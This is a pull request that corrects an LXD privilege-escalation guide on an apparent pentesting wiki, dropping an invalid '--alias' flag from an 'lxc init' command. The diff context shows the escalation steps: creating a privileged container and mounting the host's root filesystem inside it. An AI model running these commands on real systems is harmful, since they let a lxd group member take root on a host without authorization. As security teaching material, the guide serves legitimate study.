### PR TITLE
Delete non-existent flags

### DIFF
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -50,7 +50,7 @@ lxc image list #You can see your new imported image
 Create a container and add root path
 
 ```bash
-lxc init alpine privesc -c security.privileged=true --alias=alpine
+lxc init alpine privesc -c security.privileged=true
 lxc list #List containers
 
 lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true


### PR DESCRIPTION
I'm always happy to refer to it 🙏 

I ran the lxc init command as documented and got the following error.
I am sorry that I did not record the version of lxc at the time it occurred, but I do not think the flag is necessary because the alias is already specified in the syntax.

```
$ lxc init alpine privesc -c security.privileged=true --alias=alpine
< privesc -c security.privileged=true --alias=alpine
Error: unknown flag: --alias
```